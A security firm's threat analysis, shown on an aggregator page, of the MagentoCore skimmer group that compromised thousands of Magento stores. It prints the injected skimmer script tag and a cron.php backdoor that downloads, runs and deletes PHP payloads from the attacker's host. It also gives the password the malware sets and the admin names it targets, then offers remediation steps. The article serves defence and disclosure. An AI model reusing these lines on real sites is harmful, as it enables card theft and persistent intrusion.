惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

N
Netflix TechBlog - Medium
Microsoft Azure Blog
Microsoft Azure Blog
罗磊的独立博客
博客园 - 三生石上(FineUI控件)
aimingoo的专栏
aimingoo的专栏
B
Blog RSS Feed
V
Visual Studio Blog
P
Proofpoint News Feed
云风的 BLOG
云风的 BLOG
博客园 - 【当耐特】
大猫的无限游戏
大猫的无限游戏
Application and Cybersecurity Blog
Application and Cybersecurity Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
The Cloudflare Blog
B
Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Apple Machine Learning Research
Apple Machine Learning Research
M
MIT News - Artificial intelligence
Know Your Adversary
Know Your Adversary
I
InfoQ
T
The Exploit Database - CXSecurity.com
V
Vulnerabilities – Threatpost
C
Cisco Blogs
Spread Privacy
Spread Privacy
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
P
Palo Alto Networks Blog
Simon Willison's Weblog
Simon Willison's Weblog
月光博客
月光博客
博客园 - Franky
Project Zero
Project Zero
G
Google Developers Blog
S
SegmentFault 最新的问题
博客园 - 聂微东
P
Privacy & Cybersecurity Law Blog
The GitHub Blog
The GitHub Blog
阮一峰的网络日志
阮一峰的网络日志
P
Privacy International News Feed
T
Threat Research - Cisco Blogs
S
Schneier on Security
Microsoft Security Blog
Microsoft Security Blog
G
GRAHAM CLULEY
S
Security @ Cisco Blogs
Martin Fowler
Martin Fowler
A
Arctic Wolf
T
Tenable Blog
L
LINUX DO - 最新话题
TaoSecurity Blog
TaoSecurity Blog
Hugging Face - Blog
Hugging Face - Blog
有赞技术团队
有赞技术团队
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com

Sansec - experts in eCommerce security

GorgonAgora: 4,800+ fake storefronts skim cards across hundreds of impersonated brands Sansec adds support for Sylius 1 & 2 Critical vulnerability in Mirasvit Cache Warmer for Magento Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts Composer vulnerability leaks GitHub tokens, threatens PHP supply chain Over 200 PrestaShop stores expose installer, allowing full takeover ClickFix malware hits DoD cybersecurity vendor homepage SVG Onload Tag Hides Magecart Skimmer on 99 Stores Mass PolyShell attack wave hits 471 stores in one hour Novel WebRTC skimmer bypasses security controls at $100+ billion car maker PolyShell: unrestricted file upload in Magento and Adobe Commerce Digital skimmer hits global supermarket chain Building a faster YARA engine in pure Go Magento Developers Impersonated in Targeted GitHub Malware Operation Claude finds 353 zero-days on Packagist The billion-dollar security.txt problem Keylogger targets 200,000+ employees at major US bank ConnectPOS leaked Github secrets for years Critical backdoor found in MGT Varnish extension SessionReaper attacks have started, 3 in 5 stores still vulnerable SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236) Adobe patches critical Magento admin takeover via menu injection Backdoor found in popular ecommerce components Found defunct.dat on your site? You've got a problem. You have 2 weeks left to set up CSP for your store Merchants left guessing at last-minute PCI-DSS u-turn Magento Security Release APSB25-08 [Impact Analysis] Sorry, client-side security does not work Google services abused in skimming campaigns Thousands of Adobe Commerce stores hacked in competing CosmicSting campaigns CosmicSting attack & defense overview Persistent backdoors injected on Adobe Commerce via new CosmicSting attack CosmicSting attacks have started hitting major stores Polyfill supply chain attack hits 100K+ sites CosmicSting attack threatens 75% of Adobe Commerce stores Persistent Magento backdoor hidden in XML Sansec joins forces with Google's VirusTotal Sansec and Europol counter online skimming Magento wish list exploit bypasses WAF protection Is your store’s newsletter being used for phishing? Malware Persistence via Telegram and GitHub Postponed Exfiltration Evades Detection Sansec analysis: 12% of online stores leak private backups Vendors defeat Magento security patch (+ simple check) Fake Klaviyo accounts added to Magento Adobe Commerce merchants to be hit with TrojanOrders this season Extortion of Magento merchants Surge in Magento 2 template attacks Magento vendor Fishpig hacked, backdoors added Magento 2 critical vulnerability (CVE-2022-24086 & CVE-2022-24087) NaturalFreshMall: a Magento Mass Hack Magento and the Log4j vulnerability NginRAT parasite targets Nginx CronRAT malware hides behind February 31st New linux_avp malware hits eCommerce sites Case Study: How eCommerce Hackers Silently Steal Credit Card Data Google Apps Script used to steal data Fake payment page before checkout on Shopify and BigCommerce eCommerce trojan accidentally leaks victims Hackers exploit security flaw right before Black Friday Payment skimmer hides in social media buttons Cardbleed: 3% of Magento install base hacked North Korean hackers are skimming US and European shoppers Digital skimmer runs entirely on Google, defeats CSP Lockdown: Stores closed, online stores hacked Do these two things to keep your Magento 1 store running after June Magento 1 still PCI compliant after 1 July 2020? Sansec reveals longest Magecart skimming operation to date [Analysis] Maxcluster and Sansec partner to secure German stores Indonesian Magecart hackers arrested Payment skimmers have impersonated Sansec American Cancer Society hit by payment skimmer Magento security extentions vendor got hacked FBI recommends eCommerce malware protection Sansec at Europol training: 50,000+ stores hacked PCI-SSC/RHISAC quote Sansec: 20% stores reinfected Critical Magento 2 flaw exploited within 16 hours 57 payment gateways from Germany to Brazil targeted Sports brand Puma infected with advanced malware Credit cards of Atlanta Hawks fans stolen Bad extensions now main source of Magento hacks: a solution! Large sites hacked via Adminer database tool PHP tool 'Adminer' leaks passwords Competing digital skimmers sabotage each other Merchants struggle with MageCart reinfections Backdoor found in Webgility Unpublished security flaws (0days) massively exploited German political party store hacked before election MageCart: now with tripwire ABS-CBN next in series of high profile breaches Is your Google Analytics code malicious? Hackers breached Magento through helpdesk Cryptojacking found on 2496 online stores Why ordering HTTP headers is important Warning: fake Magento patch 9789 contains virus A Magento breach analysis: part 1 An OpenCart/Magento hacking dashboard Self-healing malware restores itself after deletion Visbot malware found on 6691 stores [analysis] Criminals have rewired 3,500 online stores
MagentoCore group hacks 7,339 stores and counting
Sansec Forensics Team · 2018-08-30 · via Sansec - experts in eCommerce security

A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.

Update 2018-09-07: Because Google Chrome has added the campaign to its blocklist last Saturday, the skimmers are now rapidly replacing "magentocore.net" with "magento.name". In the last 24h, they have updated at least 190 compromised stores.

Online skimming - your identity and card are stolen while you shop - has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.

The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.

The group hasn't finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks, according to Sansec crawler data.

The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their card and identity stolen.

How it works

The MagentoCore skimmers gain illicit access to the control panel of an e-commerce site, often with brute force techniques (automatically trying lots of passwords, sometimes for months). Once they succeed, an embedded piece of Javascript is added to the HTML template:

<script
  type="text/javascript"
  src="https://magentocore.net/mage/mage.js"
></script>

This script (backup) records keystrokes from unsuspecting customers and sends everything in real-time to the "magentocore.net" server, registered in Moscow.

The malware includes a recovery mechanism as well. In case of the Magento software, it adds a backdoor to cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.

shell_exec("wget -c https://magentocore.net/clean.json -O ./app/code/core/clean.php 2>&1");
shell_exec("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");
shell_exec("php ./app/code/core/clean.php 2>&1");
shell_exec("php ./app/code/core/clear.php 2>&1");
unlink('./app/code/core/clean.php');
unlink('./app/code/core/clear.php');

The file clean.json (backup) is PHP code that removes any competing malware from the site, searching for ATMZOW, 19303817.js and PZ7SKD.

The file clear.json (backup) changes the password of several common staff user names to how1are2you3 (see below for list).

What can you do to fix the MagentoCore skimmer?

If you are a merchant and found the MagentoCore.net skimmer in your store, this is the to-do list for your ops team / forensic investigator.

  1. Find the entry point: how could attackers gain unauthorized access in the first place? Analyse backend access logs, correlate with staff IP's and typical working hours. If suspicious activity is recorded from staff IPs, it could be that a staff computer is infected with malware, or that the attacker has hijacked an authorized session.
  2. Find backdoors and unauthorized changes to your codebase. Usually there are a few, both in frontend/backend code and the database. My opensource Magento Malware Scanner can be useful here.
  3. Once you have established all means of unauthorized access, close them all at once.
  4. Remove the skimmer, backdoors and other code. Revert to a certified safe copy of the codebase, if possible. Malware is often hidden in default HTML header/footers, but also in minimized, static Javascript files, hidden in deep in the codebase. You should check all HTML/JS assets that are loaded during the checkout process.
  5. Implement secure procedures that cover timely patching, strong staff passwords etcetera. A good starting point.

If your team has little experience with forensic analysis, it generally pays off to hire a professional investigator. S/he will find the entry vector faster and perhaps more important, has a lower risk of leaving any undetected backdoors. One missed backdoor and you can start all over in a few weeks.

Admin user names

The MagentoCore malware will set the password to how1are2you3 for the following admin accounts periodically:

1468177885   1470303373   a            aborman      acid         admin01
admin1       admin123     admin5       adminhendra  adminnew     adminray
admins       adminu       admin_bfei   admin_ihfb   afletcher    ajen
alexgvn123   alif         ameendering  Ameliaaa     an           anin48
anjeng       anjeng12     Anr_01       ardyan       as           asdasd
astroeh      asu123       asuasu       asulan123    Audi         azer
aziz         Backup       backup_35f69 badcc        bangsat      berandal
bgades       bgross       biji         bschlotter   bwilson      c0krek
cahyodp      camuv1653    casa         cbaker       cecun        cevans
cgcf         cgreenfield  cknobloch    clayser      ClayX404     cmorgan
coco         codex        coq          cruis        cvanstryland cwarton
d            dalexander   ddoine       Death        dede         dedeganteng
default123   defaults     defaults01   defaut123    design       developer
dhsjcsc      diablox      Dian2206     dkelly       dlc          dmorgan
dpender      dsacks       dstefan      eCommerce    edorr        ehooser
einlow       ejameson     ekennedy     erik         erobinson    eznt@i.ryanb
family       faqih212     FathurFreakz ferdi123     fikrihaikal3 forme
frozen404    fwilde       geizkayusuf  gfd          ggrav        ghaz
gigihmhd     gladz        gmr          golix19      GolixGates1  google
gustaman     haydar       haydra       hell         hiddenymouz  hornetto
hunter2      hydro        Hysoka       i            ibizta       iko
indoxploit   iniadmin     irfan        jaja         jancok       jancoks
janderson    jayzweed     jbonnell     jdragovich   jefri        JelexCrew
jengel       jhemphill    jhogan       jhult        jmartin      jockerdz
jonson       jtappe       juancok      katon        kedaong      kehise
kenta        khise        khoogers     kimak        kimyounsin   king
kkruger      kmagnan      knap13       knelson      Kontol900!   kotack
kuyas        kwwilliams   kwynia       lalapo123    LastTouch    lluethje
localsystem  Loic         lthummagunta lucu         m4tr1x       madmax
maganeto     magento      magento1     mageplas     magsupport   malang
manggo       manick       masthio01    mcopa        meldred      Memekl3g17
mgonzalez    mind         mlaudenbach  mlomo        momo         moza
mperry       mranupak     mrsakso      msas         msf          msivalingam
mtrudell     mturico      mwaldner     mwelbig      mwendt       nathan
nbrouwer     ncastelli    neqyns13     ngentod      ngentot123   nmccray
nnordman     noob         novara       nrussell     nzero        o
omyo123      ouni         owadmin      pak          paypal       pbk7695K@
penggunalaya pikri        policy       pujasucipto  putra7695K   r0cky
rami         rctioke7     rcummings    rdewolfe     restuser     revian29
rezafirdaus  rezafirdaus2 rhaan        Rieqy        rieqyns13    rkm48
rmiller      robert       Root         rseeker      s            sadmin
samikom      sav.admin    saz          sdunham      semprol      sgood
sgoodman     shansen      shayer       sheinz25     Shor7cut     Sihdaunix
sjohnson     slackerc0de  slamusga     smolix       soliro       ss123
staff.develo stores       stupid       Support      surya        surya1
svandenheuve swhite       sysadm       sysadmiin    sysadmin     sysadmin1
sysmon       system32     systemadmin  systembackup T1KUS90T     tadamec
tae          tamedeo      tanderson    task         teastmond    telgersma
terserah     tesdar       test         tfgh         Thole129     tomhawk
training     tvanhouten   ubehera      ui           upel666      uSer
VHiden133    vpotter      wajixz       wawa         wew          ybickham
youmisscry   ywigaraa     zadmin       zaz          ziko         zxc
zxcyou636    _admin       gogle        Nexcess

Further reading

Read more